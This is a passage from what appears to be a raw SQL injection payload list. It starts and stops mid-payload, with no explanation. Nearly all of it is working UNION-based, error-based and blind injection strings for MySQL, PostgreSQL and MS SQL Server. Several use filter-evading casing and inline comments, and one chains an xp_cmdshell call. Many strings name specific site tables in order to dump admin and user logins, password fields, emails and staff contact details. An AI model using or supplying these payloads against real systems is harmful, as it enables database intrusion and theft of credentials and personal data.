from information_schema.tables limit 58,1/* 1 and 1=2 union select 1,2,version(),4,5,6,7,8,9,10,11,12,13 1 and 1=-2 union select 1,2,version(),4,id,6,7 from ou_publications_st/* -1 and 1=2 union select 1,concat_ws(char(58),@@version,user(),database(),@@version_compile_os),3,4,5,6 -- 1 and 1=2 union select concat_ws(0x0b,password),2,3,4,5 from admin-- 1' and 1=2 union select concat_ws(0x3a,database(),version(),user()) -- 1 and 1=2 union select concat_ws(char(58),@@version,user(),database(),@@version_compile_os),2 -- 1 and 1=2 union select table_name,2,3 from information_schema.tables limit 1,1/* 1' AND 1=2 UNION SELECT version(),2,3 # 1 anD 1=7 uniON all seLECT 1,2,conCAt_wS(ChAR(42,42,42),user(),database(),version()),4,5,6,7,8,9,10,11,12,13/* 1/**/and/**/1=7 /**/union/**/all/**/select/**/1,version(),3,4,5 from users-- 1 anD 1=7 uniON seLEcT 1,version(),3/* 1 anD 1=7 uniON seLEcT 1,version(),user(),database(),5 1 anD 1=8 uniON all seLEcT login from users/* 1/**/anD/**/1=8/**/uniON/**/seLEcT/**/1,2,3,version(),user(),database(),7,8 -- 1 and 1=8 union select 1,name,3,4,id,6,7,art,9 from cat/* 1 anD 1=8 uniON seLECT 1,version(),3,4/* 1 and 1=9 union(select 1,2,3,4,version()) 1 anD 1=9 union select 1,version() 1 and 1=cast((select chr(126)||chr(32)||current_database()||chr(32)||chr(124)||chr(32)||user||chr(32)||chr(124)||chr(32)||version()||chr(32)||chr(126)) as int) 1 and 1=cast((select version()) as int) 1 and 1=cast((select version())||chr(32)||user as int) 1' and 1=cast((SELECT version()||chr(58)||current_user||chr(58)||current_database()) as int)-- 1 and 1=cast((select version()||chr(58)||user)||chr(58)||current_database() as int) 1 and 1=convert(integer,(select @@version)) 1 and 1=convert(int,@@version)-- 1) and 1=(select 1 from (select count(*) from (select 1 union select 2 union select 3)x group by concat((select concat_ws(0x3a,user_loginname,user_password) from e107_user limit 0,1),0x3a,floor(rand(0)*2)))y)-- 1 and 1 union select 1,concat_ws(0x20,username,password,user(),database(),@@version),3,4,1,6,7,8,9,10,11 from tbl_user_access-- -1 and 1 union select concat(email,0x3a,password),2,3,4,5,6,7 from users limit 1,1/* 1 and 2=0 union select 1,AES_DECRYPT(AES_ENCRYPT(version(),0x71),0x71),3,4/* 1 and 2=0 union select 1,concat_ws(0x3a,version(),user()),3,4/* 1 and 2=0 union select concat_ws(0x3a,email,password) from users 1 and 2=1 union select 1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10,11/* 1 and 2=999 union select concat_ws(0x3a3a3a,id,name,pasw,mail),2 from users_db-- 1 and ascii(lower(substring(version(),1,1)))>51 /* 1 AND ascii(lower(substring(version(),1,1)))=52/* 1' and extractvalue(0x3b,concat(0x3b,(select concat_ws(0x3a,version(),user()))))-- 1')) AND _goods.osn='1' AND _goods.is_publish='1' AND _subcats.is_publish='1' AND _cats.is_publish='' AND _subcats.id=_goods.ids AND _cats.id=_goods.idc union select 1,2,3,4,5,concat_ws(0x3a,table_schema,table_name,column_name),7,8,9 from information_schema.columns where table_name='_users' -- 1 and lower(substring(version(),1,11))=char(52,46,48,46,50,55,105,110,111,100,101) 1 AND lower(substring(version(),1,1))='5' 1 and null union select 1,2,3,concat_ws(0x3a,username,password),5,6,7,8,9 from users limit 0,1/* 1 and null union select concat_ws(0x3a,user(),database(),version()),2,3,4,5,6,7,8,9/* (1)and(select 1 from(select count(*),concat((select concat_ws(0x3a,user(),database(),version())),floor(rand(0)*2))x from information_schema.tables group by x)a)-- 1' and(select 1 from(select count(*),concat((select concat_ws(0x3a,user(),database(),version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) -- 1)and(select1from(selectcount(*),concat((selectversion()),floor(rand(0)*2))xfrominformation_schema.tablesgroupbyx)a)-- 1 and (select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a) 1 and(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)-- 1' and substring(version(),1,1)=4 /* 1 AND substring(version(),1,1)=4/* -1' and substring(@version(),1,1)=5-- 1 and substring(@@version,1,1)=5 1 and substring(version(),1,1)=5 1' and substring(version(),1,1)=5 -- 1 AND SUBSTRING(version(),1,1)=5./* 1 and substring(@@version,1,1)=5//true 1 and substring(version(),1,1)=6 union select 1,2,group_concat(user_login,char(58),user_pass),4,5 from wp_users 1 and substring(@@version,1,1)9=5//true 1/*fLcReW*/aNd/*fLcReW*/1=2/*fLcReW*/uNiOn/*fLcReW*/aLl/*fLcReW*/sEleCt/*fLcReW*/CoNcAT(user,0x3a,password),0x44616e7a656c2028664c6153686352655729,0x33,0x34 fRoM mysql.user-- -1 group by 10 union select 1,2,id,4,5,6,7,8,9,10,11/ -1 group by 10 union select 1,2,version(),4,5,6,7,8,9,0,11/* 1 group by 1 union select 1,2,version()/* -1' group by 1 union select 1,concat_ws(0x3a,version(),database(),user()) -- 1 group by tblProducts.ProductID having 1=1-- ## 1 gunion select 1,2,3,4 -- 1'id=-13 union select 1,2,3,4,5,6,7,8,9,10,11,12,13/* 1 limit 0 union select 1,concat_ws(0x3a,user(),version(),database()),3,4-- 1-null union select 1,aid from nuke_authors-- ## 1 or 1 ## 1 or 1' -1' or 1=1-- -1' or 1=1/* 1' or '1'='1 order by 1-- -1' or(1,1)=(select count(0),concat((select concat(email_address,char(58),password) from dp_users limit 0,1),floor(rand(0)*2))from(information_schema.tables)group by 2)-- -1' or(1,1)=(select count(0),concat((select concat_ws(0x3a,user(),database(),version()) from information_schema.tables limit 0,1),floor(rand(0)*2))from(information_schema.tables)group by 2)-- -1 or(1,1)=(select count(0),concat((select concat_ws(0x3a,user(),database(),version()) from information_schema.tables limit 125,1),floor(rand(0)*2))from(information_schema.tables)group by 2)-- -1) or(1,1)=(select count(0),concat((select database() from cms_menus_configs limit 0,1),floor(rand(0)*2))from(cms_menus_configs)group by 2)-- -1 or(1,1)=(select count(0),concat((select database() from information_schema.tables limit 0,1),floor(rand(0)*2))from(information_schema.tables)group by 2)-- 1' or (1,1)=(select count(0),concat((select database() from information_schema.tables limit 0,1),floor(rand(0)*2))from(information_schema.tables) group by 2)-- 1' or(1,1)=(select count(0),concat((select version() from information_schema.tables limit 0,1),floor(rand(0)*2))from(information_schema.tables) group by 2)-- -1 or(1,1)=(select count(0),concat((select who from userlist limit 0,1),floor(rand(0)*2))from(information_schema.tables)group by 2)-- 1 or (1,1)=(select count(0),concat(version(),floor(rand(0)*2))from(st_banner_shows)GROUP BY 2)-- 1' or(1,1)=(select count(*),concat((select concat_ws(0x3a,email,password,name,user_group) from dimigo_users LIMIT 0,1),floor(rand(0)*2))from(information_schema.tables) GROUP BY 2)-- 1 or(1,1)=(select count(*),concat_ws(0x3a,(select concat(user,0x3a,pass) from userlist limit 0,1),floor(rand()*2)) from information_schema.tables group by 2 limit 1,1)-- -1 OR 1=2 -1 or 1=2 union select 1,2,3,4,5,6,version(),8,9,0,1,2,3,4,5,6,7,8,9-- 1 or 1=db_name() 1 or 1 group by concat(concat_ws(0x3a3a,version(),user(),database(),@@version_compile_os),rand(0)|0) having min(0)-- 1' or 1 group by concat(mid((select TABLE_NAME from information_schema.tables where(table_schema!=0x696E666F726D6174696F6E5F736368656D61)limit 0,1),1,63),floor(rand(0)*2))having min(0) -- 1) or 1=(SELECT db_name())-- -1' OR 1=(SELECT db_name())-- 1 OR 1=(SELECT DB_NAME()) -- -1 or 1=(select system_user)-- 1' or 1=(select system_user)-- -1 or 1=(select system_user)kdoru 1 or 1=(select top 1 cast(admin_id as nvarchar) ':' cast(admin_name as nvarchar) ':' cast(admin_pasword as nvarchar) from tblAdminLogin)-- 1 or 1=(SELECT TOP 1 cast(admin_username as nvarchar) char(58) cast(admin_password as nvarchar) FROM admin_users)-- 1 or 1=(SELECT TOP 1 cast(C_Username as nvarchar) ':' cast(C_Password as nvarchar) from CMS_USER WHERE CMS_USER_ID=2)-- 1 or 1=(SELECT TOP 1 cast(email as nvarchar) ':' cast(login as nvarchar) ':' cast(password as nvarchar) from MEMBER where member_id=10)-- 1 or 1=(SELECT TOP 1 cast(Email as nvarchar) ':' cast(PWD as nvarchar) FROM vwWebUsers WHERE ID=10)-- 1 or 1=(SELECT TOP 1 cast(Email as nvarchar) ':' cast(UserPass as nvarchar) from AccountMaster)-- 1 or 1=(SELECT TOP 1 cast(email as nvarchar) char(58) cast(Password as nvarchar) FROM membermaster)-- 1 or 1=(SELECT TOP 1 cast(id as nvarchar) ':' cast(FName as nvarchar) ':' cast(MName as nvarchar) ':' cast(LName as nvarchar) ':' cast(Email as nvarchar) ':' cast(StreetAddress as nvarchar) ':' cast(City as nvarchar) ':' cast(State as nvarchar) ':' cast(Zip as nvarchar) ':' cast(HomePhone as nvarchar) ':' cast(WorkPhone as nvarchar) ':' cast(Cell as nvarchar) ':' cast(Pager as nvarchar) ':' cast(Fax as nvarchar) ':' cast(UserName as nvarchar) ':' cast(Password as nvarchar) ':' cast(DateEntered as nvarchar) ':' cast(DateModified as nvarchar) from Staff)-- -1 or 1=(select top 1 cast(login as nvarchar) ':' cast(passw as nvarchar) from tMKSInetUser where UserID=1)-- 1 or 1=(SELECT TOP 1 cast(login as nvarchar) ':' cast(password as nvarchar) from admins)-- 1 or 1=(SELECT TOP 1 cast(login as nvarchar) ':' cast(password as nvarchar) from admins where admin_id=1)-- 1 or 1=(SELECT TOP 1 cast(login as nvarchar) char(58) cast(password as nvarchar) FROM users)-- 1 or 1=(select top 1 cast(login_name as nvarchar) ':' cast(password as nvarchar) ':' cast(email_address as nvarchar) from admin_logins) 1 or 1=(SELECT TOP 1 cast(LoginName as nvarchar) char(58) cast(Password as nvarchar) from users)-- 1 or 1=(SELECT TOP 1 cast(LOGON_ID as nvarchar) ':' cast(Password as nvarchar) from users where USER_ID=2)-- 1 or 1=(SELECT TOP 1 cast(M_USERNAME as nvarchar) ':' cast(M_PASSWORD as nvarchar) from FORUM_MEMBERS WHERE MEMBER_ID=1)-- 1 or 1=(SELECT TOP 1 cast(Nickname as nvarchar) ':' cast(Password as nvarchar) from Utenti where ID_Prov=1)-- 1 or 1=(SELECT TOP 1 cast(shortname as nvarchar) ':' cast(passwd as nvarchar) from member_list)-- 1 or 1=(SELECT TOP 1 cast(user as nvarchar) char(58) cast(pwd as nvarchar) FROM users)-- 1 or 1=(select top 1 cast(UserID as nvarchar) ':' cast(Password as nvarchar) ':' cast(Admin as nvarchar) ':' cast(name as nvarchar) from users where UserID=1)-- 1 or 1=(SELECT TOP 1 cast(UserID as nvarchar) ':' cast(UserEmail as nvarchar) ':' cast(UserPass as nvarchar) FROM TUserFrame where userid=44)-- 1 or 1=(SELECT TOP 1 cast(UserID as nvarchar) ':' cast(Username as nvarchar) ':' cast(Password as nvarchar) FROM Users where UserID=1)-- 1 or 1=(SELECT TOP 1 cast(username as nvarchar) ':' cast(password as nvarchar) ':' cast(email as nvarchar) from Customersreal where CustomerID=150)-- 1 or 1=(SELECT TOP 1 cast(username as nvarchar) ':' cast(password as nvarchar) from admin_user)-- 1 or 1=(SELECT TOP 1 cast(username as nvarchar) ':' cast(password as nvarchar) from ashes_admin)-- 1 or 1=(SELECT TOP 1 cast(username as nvarchar) ':' cast(password as nvarchar) from cms_users)-- -1 or 1=(select top 1 cast(username as nvarchar) ':' cast(password as nvarchar) from Extuser where username not in ('gsbhatia','spprasu'))-- 1 or 1=(SELECT TOP 1 cast(Username as nvarchar) ':' cast(Password as nvarchar) from frmAuthor) 1 or 1=(SELECT TOP 1 cast(user_name as nvarchar) ':' cast(Password as nvarchar) from gpr_user_tbl)-- 1 or 1=(SELECT TOP 1 cast(username as nvarchar) ':' cast(password as nvarchar) from Members where MemberID=2)-- 1 or 1=(SELECT TOP 1 cast(USERNAME as nvarchar) ':' cast(PASSWORD as nvarchar) from SEC_USER)-- -1' or 1=(select top 1 cast(username as nvarchar) ':' cast(password as nvarchar) from users)-- 1 or 1=(SELECT TOP 1 cast(username as nvarchar) ':' cast(password as nvarchar) from users where user_id=1)-- 1 or 1=(SELECT TOP 1 cast(user_name as nvarchar) ':' cast(user_email as nvarchar) ':' cast(user_Password as nvarchar) from users where user_id=58)-- 1 or 1=(SELECT TOP 1 cast(username as nvarchar) char(58) cast(password as nvarchar) FROM AdminUsers)-- 1 or 1=(SELECT TOP 1 cast(Username as nvarchar) char(58) cast(Password as nvarchar) from Users)-- 1 or 1=(SELECT TOP 1 cast(user_username as nvarchar) ':' cast(user_PASSWORD as nvarchar) from userS)-- 1 or 1=(SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='cbuser' AND COLUMN_NAME NOT IN ('newsid','ID','Name','PW'))-- 1 or 1=(SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='q_registrants' AND COLUMN_NAME NOT IN ('reg_id','name','address','tel','email','took_a_shot','successful','date_inserted'))-- 1' or 1=(SELECT TOP 1 email FROM cdrequests where id=2000)-- 1 or 1=(SELECT TOP 1 Email FROM vwWebUsers WHERE id='1')-- 1 or 1=(select top 1 id from dtproperties)-- 1 or 1=(SELECT TOP 1 id FROM vacancy)-- 1 or 1=(SELECT TOP 1 last_name FROM csweb_user)-- 1 or 1=(SELECT TOP 1 nota_id FROM a_nota)-- 1 or 1=(SELECT TOP 1 passw from Tadmins where username='roby')-- 1 or 1=(SELECT TOP 1 Password from artUsersAdmin))-- 1' or 1=(SELECT TOP 1 plyrnum FROM plyrbioHTML)-- 1 or 1=(SELECT TOP 1 pName from tblWebsiteUsers)-- 1 or 1=(select top 1 RequestDoc1 from dbo.vwWebUsers)-- 1 or 1=(select top 1 table_name from information_schema.columns where column_name like 'password')-- 1' or 1=(select top 1 table_name from information_schema.tables)-- 1' or 1=(selecttop1table_namefrominformation_schema.tables)-- -1 or 1=(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES)-- 1 or 1=(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES)-- 1 or 1=(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('admin','clients','clients_id','Content','DomainPrices','Domains','dtproperties','forum_data','forum_mails','forum_theme','forum_title','help','hosting','idClient','Links','Log','Mailer','Menu','Meta','MetaLinks','News','paystat','paystat1','pot_clients','pot_kinds','property','support','SupTopicAnswers','SupTopics','sysconstraints','syssegments','ue'))-- 1 or 1=(select top 1 table_name from information_schema.tables where table_name not in ('articles','Ans','Que','Site_Articles','Site_Articles1','Site_Forum_A_TOPICS','Site_Forum_ALLOWED_MEMBERS','Site_Forum_CATEGORY','Site_Forum_CONFIG_NEW','Site_Forum_FORUM','Site_Forum_A_REPLY','Site_Forum_GROUPS','Site_Forum_GROUP_NAMES','Site_Forum_MEMBERS','Site_Forum_MEMBERS_PENDING','Site_Forum_MODERATOR','Site_Forum_REPLY','Quiz','Site_Forum_SUBSCRIPTIONS','Site_Forum_TOPICS','Site_Forum_TOTALS','Site_Numbers','Site_numbers1','Site_Rubrics','Site_Pictures','Site_Users','Site_Users_Conf','Site_Texts','Site_Users_Privs','Site_Users_Emails','View_Adv_Search','sysconstraints','syssegments','t_jiaozhu','D99_Tmp','dtproperties'))-- 1 or 1=(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('bankdel','bankseek','cbr','currency_exch','currency_opt','currency_zayavka','doc_req','documents','dtproperties','forums','keybaseb','keybasef','messages','news1'))-- 1 or 1=(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.tables WHERE TABLE_NAME NOT IN ('cartV2','c2h_ContentPublish','CustomCharge','vwLateFIGrpPostCur','surfaceview_OrderDetails','mayfairtoys_Links','retailteam_SupplierProductLink','DateWatch'))-- 1 OR 1=(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN char(78) char(101) char(119) char(115) char(108) char(101) char(116) char(116) char(101) char(114) char(80) char(114) char(101) char(112) char(97) char(114) char(101) char(100) char(69) char(109) char(97) char(105) char(108) char(115)) 1 or 1=(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN (char(84) char(105) char(99) char(107) char(78) char(101) char(119) char(115)))-- 1' or 1=(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('comd_list','Buildings','Communities','dtproperties','Maps','sysconstraints','syssegments','cmd','D99_CMD','D99_REG','D99_Tmp','kill_kk'))-- 1 or 1=(select top 1 table_name from INFORMATION_SCHEMA.TABLES where table_name not in ('content_history','ad_mapping_tbl','app_messages','approval_status_tbl','approval_tbl','calendar_event_tbl','calendar_tbl','cms_content_types','config_tbl','content','content__','content_edit','content_folder_tbl','content_index','content_index_new','content_meta_tbl','content3','dtproperties','edit_meta_tbl','folder_to_template_tbl','fonts','form_tbl','history_meta_tbl','history_xml_tbl','language_type','library','library_folder_tbl','libtype','load_balance_tbl','max_entries','metadata_type','module_licenses','nav_tbl','nav_to_content_tbl','permissions_tbl','save_meta_tbl','save_tbl','settings','sysconstraints','syssegments','tbl_bettData','templates_tbl','user_to_group_tbl','usergroups','users','xml_collection_tbl','xml_to_item_tbl')) 1 or 1=(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('ContentItem','ContentItem_Person','Archive','Archive_Pass','ArchiveColumn','ArchiveColumn_ValidationScheme', 'Area','Category','Category_Client','Category_Record','CCRCRole','Client_Category','Conference','ContentGroup','ContentItem_ContentItemDesc','ContentItemDesc','ContentItemType','cw_Client','cw_Client_Card','cw_client_newsletter','cw_client_newsletter_old','cw_Client_Pass','cw_Client_RecordPass','cw_CreditTrans','cw_NewslettersSent','cw_Pass','cw_RecordRelate','cw_Session','DiscussionPost','DiscussionTopic','DiscussionTopic_Record','dtproperties','EditionList','Event','Fact','Import','Link','Main','NB_Commander_Tmp', 'NewsletterFormat','OrgType','Person','PluginRecord','Presentation','Presentation_Conference','Presentation_ContentItem','Presentation_Person','Record_Pass','RecordSecurity','ResearchProject', 'ResearchProject_Person','Search','Seminar','Seminar_ContentItem','Seminar_Person','sysconstraints','syssegments','ValidationScheme'))-- 1' or 1=(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('CR_COURSE_INFO','AspNet_SqlCacheTablesForChangeNotification','BUILDING','CONTENT','CPST_Admin','CPST_Clients','CPST_Employees','CPST_OF','CPST_Projects','CR_COURSE_REVIEW','CR_FAC_INFO','DIVISION','dtproperties','EMAILS','FAC_ADVISING','FAC_ADVISING_ROLE','FAC_ADVISING_STUDENT_TYPE','FAC_CERTIFICATION','FAC_CONSULTING','FAC_EDADVISE','FAC_EDUCATION','FAC_EXPERIENCE'))-- 1 or 1=(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('dtproperties'))-- 1' or 1=(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('dtproperties')-- -1 or 1=(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN('dtproperties','ALUMNI_HUMOR','ALUMNI_PHOTO','kill_kk','ALUMNI_FACULTETS','ALUMNI_GBOOK','ALUMNI_JOB','ALUMNI_LOGINS','ALUMNI_NEWS','ALUMNI_PEOPLE','ALUMNI_PEOPLE_PHOTOS','FILTER_IP','PartnerClicks','Partners','sysconstraints','syssegments'))-- 1' or 1=(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('dtproperties','clients','posting','sysconstraints','syssegments','tems','thread'))-- 1 or 1=(select top 1 table_name from information_schema.tables where table_name not in('Formats','Images','DataTypes','forum_posts','Samples','News','Artists','Admin','Discography','Tracks','Newsletter','forum_users','OrderDetails','Orders','Countries','Customers','Shipping','Products','FormatVariations','ShippingCosts','forum_forums','ShippingZones','Newsletters','GalleryFiles','newsletter_content','Audio','Links','Mailinglist','View_orders','Homepage','Artist_Extras','Artist_Charts','sysdiagrams','GalleryCat','Releases','Gallery','Banners','mailing_poster','mailing_view','comd_list','forum_topics','Labels'))-- 1 or 1=(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('HS_TRANSACTION_LOG','dtproperties','RELEASE_UTC','releaseTBL','sysconstraints','syssegments','tntnews','vw_Release','vwDROP','vwDROP2','vwEXPIRE','vwEXPIREDATE','vwTODAY','vwUTM','vwVET','vwWeek'))-- 1 or 1=(select top 1 table_name from information_schema.tables where table_name not in('MODELS','NEWSLETTER','PAGE_groups','pages','payment','address','assets','assets_type','brands','cart','cartitems','category','connector_key','connectors','connectors_b3','connectors_b6','connectors_choir','connectors_e6','connectors_emw','connectors_headset','connectors_isomax2','contactus','downloads','items','pdfs','pdftoproducts','preferences','PREFERENCES_SECURE_STYLES','PREFERENCES_SHIPPING','PREFtoSHIP_SERVICES','PREFtoSHIP_VENDORS','prices','PRODtoCAT','products','promo_codes','SHIPPING_SERVICES','SHIPPING_VENDORS','sysconstraints','syssegments','))-- 1 or 1=(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('nachrichten','acpplayers','bundesligaspieler','cbuser','dailychess','dedownload','deevent','desupport','deutschmann_pw','deutschmann_shop','download_e','dtproperties','elturco','esnews','events_e','lapista','news','pictureup','products','products_es','servernews_es','shopd','spotlight','support','support_e','sysconstraints','syssegments','training','turnierraum','usdollar','users'))-- 1 or 1=(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('PHLP_tblBibPub','PHLP_tblBib','CoopAgree_Projects','EPRP_PRGrants','EPRP_TBLGLOBAL','invTBLCDOrder','EPRP_TBLLOGINS','invTBLCONTACT','Campus','CoopAgree_Award','CoopAgree_ContactProject','CoopAgree_ContactReviewerPanel','CoopAgree_Contacts','CoopAgree_ContactSAE','CoopAgree_Institution','CoopAgree_InstitutionOLD','CoopAgree_PanelContact','CoopAgree_Pep','CoopAgree_PepContact','CoopAgree_ProjectSAE','CoopAgree_PrtControl','CoopAgree_PrtControlParms','CoopAgree_ReviewerPanel','CoopAgree_ReviewerPanel','CoopAgree_Role','CoopAgree_SAE','CoopAgree_Security','DPHSDRTask_Clearance','DPHSDRTask_Divisions','DPHSDRTask_Meeting','DPHSDRTask_POC','DPHSDRTask_Projects','DPHSDRTask_ProjectStatus','DPHSDRTask_ProjectTypes','dtproperties','eprpTBLCONTACT','HelpDeskAdmins','ITSO_VC_SURVEY','JohnNews','LPHPRCI_UserListing','LU_Branch','LU_Division','LU_EmailGroup','LU_Request','MGMT_Developers','MGMT_Divisions','MGMT_Projects','MGMT_ProjectStatus','MGMT_ProjectTypes','OD_TBLLOGINS','ODTASK_Clearance','ODTask_Divisions','ODTASK_Meeting','ODTask_POC'))-- 1' or 1=(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('phpbb_bots'))-- 1' or 1=(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('report','category_tbl','ceremony','comd_list','conference','cyfd','DIY_TEMPCOMMAND_TABLE','dtproperties','extension_tbl','filetype_tbl','font_tbl','gaga_Commander_Tmp','GY_TmpTable','hyperlink_tbl','image_tbl','lulu','media_category_tbl'')-- 1 or 1=(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('TABLE_PRIVILEGES','TABLES','SCHEMATA','OrderSearchedWords','KNUEPPELS_Reorder','surfmedproducts','OrderProductsCOPY','Careers','Sheet1$','OrderCustomers','tblPolls','ArticleTypes','tblConfiguration','lifeplus','lifplusCLEAN','MotionWhatsNew','MotionNews','MotionLogin','OrderInsuranceApp','MalEmails','OrderMfgs','OrderProducts','Audit','ArticleCategories','StateNames','OrderReceipts','ArticleUploads','OrderOwnerProducts','OrderLIreorder','Deliveries','OrderCategory','OrderBasket','OrderOwners','AppointmentRegistration','Aronson_Referral_Form','Articles','PollTakers','Polls','PollQuestions','REFERENTIAL_CONSTRAINTS','CHECK_CONSTRAINTS','UnityHME_news','CONSTRAINT_TABLE_USAGE','CONSTRAINT_COLUMN_USAGE','VIEWS','AEROFLOW_Forms','OrderProductsNEW','VIEW_TABLE_USAGE','VIEW_COLUMN_USAGE','GalleryTopics','ResFormLineItems','GalleryPhotos','syssegments','sysconstraints','sysalternates','ValidUsers','KEY_COLUMN_USAGE','ResFormCustomers','TankMasterTanks','TankEvacuation','OrderSubmitToLoc','dtproperties','TankAnalyzerCheck','!SiteOwners','TankAudit','TankLocation','TreeList_Tmp','TankValidUsers','OrderInfoRequests','TankDetails','ResFormProducts','TABLE_CONSTRAINTS','COLUMNS','COLUMN_DOMAIN_USAGE','LINCOLN_ReferralForm','COLUMN_PRIVILEGES','DOMAINS','DOMAIN_CONSTRAINTS','UnityHME_news_categories'))-- 1 or 1=(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES where TABLE_NAME NOT IN ('tbl_dating','tbl_gossip','tbl_cards','tbl_girls','D99_Tmp','dtproperties','sysconstraints','syssegments','tbl_album','tbl_articles'))-- 1 or 1=(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('tblOrgAims'))-- 1 or 1=(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('UTILIS_Stats_Browsers'))-- 1 or 1=(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('views'))-- 1 or 1=(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('vwCertInvoice','tbBlogRSS','tbCountry','vwClassQuestion','vwEventEval','tbCardType','vwInvoice','tbCCIDcodes','vwClassQuestionResults','tbCCTranType','tbClassAnswers','tbClassChoice','tbCertRequest','Temp','tbClassGrade','tbInstructorApprove','tbeTrack','dtproperties','tbClassQuestion','tbInstApproveDetails','TEMP_NewLogins','tbMemAutoRenewTrack','tbDocuments','tbInvoice','tbEmailAddresses','TEMP_NewState','tbEmailJob','TEMP_StateCodes','tbEvaluation','TEMP_ZipCodes','tbEventDocs','TEMP_NewEmails','tbEventHomePage','TEMP_CountryCodes','tbCustomerImportRoles','tbCustomerMailList','tbEventType','tbEvMailDocs','vwBrokerReportInvoice','tbFilter_Competitor','tbFilter_DirtyWord','tbOutComeSurvey','tbMailRefer','tbForum','tbForumMessage','tbInstructorConflict','tbInstructors','tbMemberPackage','tbOnLocationClasses','tbSurveyParticipants','tblForums','tbInstHonorStatus','Temp_Josh','tbLinks','tbInstHonorDetails','tbMemberCoupon','tbLiveChat','tbInstHonorarium','tbLiveImages','itd..'))-- 1 or 1=(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('VwDictionary','dtproperties','sysconstraints','syssegments','TblAbout','tblBuildingCodes','tblCategory','TblCustom','TblCustomFields','tblEvents','tbleventshack','tbleventshack2','TblLog','tblPartI','tblPartII','tblPartIII','tblPartIV','tblPhotos','tblSchedules','tblSecurity','vwevents','vwListEvents')) 1 or 1=(select top 1 UserLoginName ':' UserPassword from tblUsers where id=3)-- 1 or 1=(SELECT TOP 1 USERNAME from Admin)-- 1 or 1=(SELECT TOP 1 username from Administration)-- 1 or 1=(SELECT TOP 1 usuario FROM USUARIO)-- 1 or 1=(select top 1 @@version from information_schema.tables)-- -1 or 1=(select user)-- -1 or 1=(select @@version)-- 1' or 1=(SELECT @@version)-- -1 or 1=system_user-- 1 or 1=system_user -1 or 1=version()-- -1' or 1=@@version -- -1' or 1=@@version-- 1 or 1=@@version 1' or 1=@@version -- 1) or 1=@@version-- 1 OR 1=@@version -- 1' or 1=(@@version );exec master..xp_cmdshell 1 order by 1 -- -1 order by 1,2,3,4,5,6-- -1 order by 1,2,3,4,5,6,7 1' order by 23/* 1 order by 5/* (@:=1)or@ group by concat(@@version,@:=!@)having@||min(0)-- 1 or (select count(*) from (select 1 union select 2 union select 3 union select 4 union select 5)x group by concat(user(),floor(rand(0)*2))) -- -1 /*!or (select count(*) from (select 1 union select 2 union select 3)x group by concat(concat_ws(0x0b,version(),user(),database(),@@version_compile_os),floor(rand(0)*2)))*/-- 1' or (select count(*) from (select 1 union select 2 union select 3)x group by concat(mid(concat_ws(0x0b,version(),user(),database(),@@version_compile_os,0x0b),1,63), floor(rand(0)*2)))-- 1 or (select count(*) from (select 1 union select 2 union select 3)x group by concat(mid(concat_ws(0x0b,version(),user(),database(),@@version_compile_os), 1, 70), floor(rand(0)*2)))-- -1 OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID(Password, 1, 63), FLOOR(RAND(0)*2))) -- -1 or (select count(*)from(select 1 union select 2 union select 3)x group by concat(mid((select version()),1),floor(rand(0)*2)))-- -1 or (select count(*) from (select 1 union select 2 union select 3)x group by concat(mid(version(),1,63), floor(rand(0)*2)))-- -1' or (select count(*) from (select 1 union select 2 union select 3)x group by concat(version(),floor(rand(0)*2))) -- -1 OR 